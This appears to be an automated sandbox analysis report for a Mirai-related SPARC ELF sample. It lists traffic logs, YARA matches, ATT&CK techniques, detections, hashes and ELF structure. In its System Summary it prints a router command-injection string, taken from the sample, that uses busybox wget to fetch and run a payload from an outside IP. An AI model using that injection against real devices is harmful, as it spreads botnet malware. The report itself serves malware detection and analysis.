              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39488
              Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
              Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
              Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
              Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40464
              Source: unknownNetwork traffic detected: HTTP traffic on port 33728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798

              System Summary

              Source: ZhhHfkNewm.elf, type: SAMPLE, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
              Source: 6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
              Source: 6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
              Source: Initial sample, String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
              Source: Initial sample, String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0+h+dPOST /tmUnblock.cgi HTTP/1.1
              Source: ELF static info symbol of initial sample, .symtab present: no
              Source: ZhhHfkNewm.elf, type: SAMPLE, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: classification engine, Classification label: mal80.troj.linELF@0/1@0/0
              Source: /tmp/ZhhHfkNewm.elf (PID: 6206), Queries kernel information via 'uname'
              Source: ZhhHfkNewm.elf, 6206.1.000055a42af6f000.000055a42aff4000.rw-.sdmp, ZhhHfkNewm.elf, 6210.1.000055a42af6f000.000055a42aff4000.rw-.sdmp, Binary or memory string: /etc/qemu-binfmt/sparc
              Source: ZhhHfkNewm.elf, 6206.1.000055a42af6f000.000055a42aff4000.rw-.sdmp, ZhhHfkNewm.elf, 6210.1.000055a42af6f000.000055a42aff4000.rw-.sdmp, Binary or memory string: U!/etc/qemu-binfmt/sparc
              Source: ZhhHfkNewm.elf, 6206.1.00007ffc8a58c000.00007ffc8a5ad000.rw-.sdmp, ZhhHfkNewm.elf, 6210.1.00007ffc8a58c000.00007ffc8a5ad000.rw-.sdmp, Binary or memory string: Kx86_64/usr/bin/qemu-sparc/tmp/ZhhHfkNewm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ZhhHfkNewm.elf
              Source: ZhhHfkNewm.elf, 6206.1.00007ffc8a58c000.00007ffc8a5ad000.rw-.sdmp, ZhhHfkNewm.elf, 6210.1.00007ffc8a58c000.00007ffc8a5ad000.rw-.sdmp, Binary or memory string: /usr/bin/qemu-sparc

              Stealing of Sensitive Information

              Source: Yara match, File source: ZhhHfkNewm.elf, type: SAMPLE
              Source: Yara match, File source: 6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY
              Source: Yara match, File source: 6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara match, File source: ZhhHfkNewm.elf, type: SAMPLE
              Source: Yara match, File source: 6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY
              Source: Yara match, File source: 6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORY

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
              Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Direct Volume Access | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
              Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | | | Data Encrypted for Impact | DNS Server | Email Addresses
              Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 3 Application Layer Protocol | | | Data Destruction | Virtual Private Server | Employee Names
              Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Scheduled Transfer | 2 Ingress Tool Transfer | | | Data Encrypted for Impact | Server | Gather Victim Network Information
              No configs have been found
              [Behavior graph: ID 1365724, Sample: ZhhHfkNewm.elf, Start date: 21/12/2023, Architecture: LINUX, Score: 80]

              Source | Detection | Scanner | Label | Link
              ZhhHfkNewm.elf | 100% | Avira | EXP/ELF.Mirai.Bot.Hua.d |
              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              http://45.142.182.103/bin | 100% | Avira URL Cloud | malware |
              http://45.142.182.103:80/tmUnblock.cgi | 100% | Avira URL Cloud | malware |
              No contacted domains info

              Name | Malicious | Antivirus Detection | Reputation
              http://45.142.182.103:80/tmUnblock.cgi | true | Avira URL Cloud: malware | unknown

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://45.142.182.103/bin | ZhhHfkNewm.elf | false | Avira URL Cloud: malware | unknown
                            Process:/tmp/ZhhHfkNewm.elf
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):310
                            Entropy (8bit):3.481808053534668
                            Encrypted:false
                            SSDEEP:6:MoYgDFmQUuKyj/VcDFmQU1IBgY/VMPj/VfKoO/VNfiY/VH:M06uKr61I0Kl
                            MD5:7E3FB24203821CB99F4EF2D93BC26FE6
                            SHA1:6CA95D9BF75B18E9199BF60D44011124911CA2A7
                            SHA-256:B6EBE00CEB7ABDC1442DB1749D7584254C06C618402CAD6756921CF2218D976A
                            SHA-512:5586BA615ACC819FCFDC9BD6832DCC7227E957D2785E8763A16BCB93A618160B738F44CB1E2BEF058A6E3ED6E2F68AF2A16D21317B3EE61F2096BF9B1481A34C
                            Malicious:false
                            Reputation:low
                            Preview:10000-1e000 r-xp 00000000 fd:00 531606 /tmp/ZhhHfkNewm.elf.2d000-2e000 rw-p 0000d000 fd:00 531606 /tmp/ZhhHfkNewm.elf.2e000-2f000 rw-p 00000000 00:00 0 .2f000-31000 rw-p 00000000 00:00 0 .ff7fe000-ff7ff000 ---p 00000000 00:00 0 .ff7ff000-fffff000 rw-p 00000000 00:00 0 [stack].
                            File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                            Entropy (8bit):6.125410439653704
                            TrID:
                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                            File name:ZhhHfkNewm.elf
                            File size:55'188 bytes
                            MD5:b757694e98b44b2a21e5654c92c98826
                            SHA1:9cb9a03cc21badd27f13ad7a09d44bb1bfb380a6
                            SHA256:ce192327b8b13edbe3fd6b37c42b16bb0dc59951379fc25b8f6d92ed64e8cc84
                            SHA512:ac999c0395e656b2bd50f3f355b9e8d7c2bd5005506a7f9f1a0bc46cd2a3d8181ac29a78b942ea8b8b08d55f9b7b8ebbc1fec049f395e8ca661ad224e322088d
                            SSDEEP:768:Q375eDpM0jowQa5LuYRqXPFbFP+sv23O+Nv/aNSGv:acDpM0jDQa5LuYoXPMr03
                            TLSH:84435931E9790E17C0D4B57B52F78629B2F5174E25A88B1E7C220F8EFF159C0216B2B5
                            File Content Preview:.ELF...........................4.........4. ...(.......................8...8...............<...<...<...\...,........dt.Q................................@..(....@.0.................#.....a...`.....!.....#T..@.....".........`......$#T..#T..@...........`....

                            ELF header

                            Class:ELF32
                            Data:2's complement, big endian
                            Version:1 (current)
                            Machine:Sparc
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - System V
                            ABI Version:0
                            Entry Point Address:0x101a4
                            Flags:0x0
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:3
                            Section Header Offset:54748
                            Section Header Size:40
                            Number of Section Headers:11
                            Header String Table Index:10
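Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
 | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 |  | 0 | 0 | 0
.init | PROGBITS | 0x10094 | 0x94 | 0x1c | 0x0 | 0x6 | AX | 0 | 0 | 4
.text | PROGBITS | 0x100b0 | 0xb0 | 0xc3ac | 0x0 | 0x6 | AX | 0 | 0 | 4
.fini | PROGBITS | 0x1c45c | 0xc45c | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 4
.rodata | PROGBITS | 0x1c470 | 0xc470 | 0xec8 | 0x0 | 0x2 | A | 0 | 0 | 8
.ctors | PROGBITS | 0x2d33c | 0xd33c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.dtors | PROGBITS | 0x2d344 | 0xd344 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.jcr | PROGBITS | 0x2d34c | 0xd34c | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
.data | PROGBITS | 0x2d350 | 0xd350 | 0x248 | 0x0 | 0x3 | WA | 0 | 0 | 8
.bss | NOBITS | 0x2d598 | 0xd598 | 0x3d0 | 0x0 | 0x3 | WA | 0 | 0 | 8
.shstrtab | STRTAB | 0x0 | 0xd598 | 0x43 | 0x0 | 0x0 |  | 0 | 0 | 1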

Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x10000 | 0x10000 | 0xd338 | 0xd338 | 6.1569 | 0x5 | R E | 0x10000 |  | .init .text .fini .rodata
LOAD | 0xd33c | 0x2d33c | 0x2d33c | 0x25c | 0x62c | 2.9578 | 0x6 | RW | 0x10000 |  | .ctors .dtors .jcr .data .bss
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |  | 
                            Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                            System Behavior

                            Start time (UTC):17:40:44
                            Start date (UTC):21/12/2023
                            Path:/tmp/ZhhHfkNewm.elf
                            Arguments:/tmp/ZhhHfkNewm.elf
                            File size:4379400 bytes
                            MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                            Start time (UTC):17:40:44
                            Start date (UTC):21/12/2023
                            Path:/tmp/ZhhHfkNewm.elf
                            Arguments:-
                            File size:4379400 bytes
                            MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                            Start time (UTC):17:40:44
                            Start date (UTC):21/12/2023
                            Path:/tmp/ZhhHfkNewm.elf
                            Arguments:-
                            File size:4379400 bytes
                            MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                            Start time (UTC):17:40:44
                            Start date (UTC):21/12/2023
                            Path:/tmp/ZhhHfkNewm.elf
                            Arguments:-
                            File size:4379400 bytes
                            MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                            Start time (UTC):17:40:44
                            Start date (UTC):21/12/2023
                            Path:/tmp/ZhhHfkNewm.elf
                            Arguments:-
                            File size:4379400 bytes
                            MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                            Start time (UTC):17:40:44
                            Start date (UTC):21/12/2023
                            Path:/tmp/ZhhHfkNewm.elf
                            Arguments:-
                            File size:4379400 bytes
                            MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e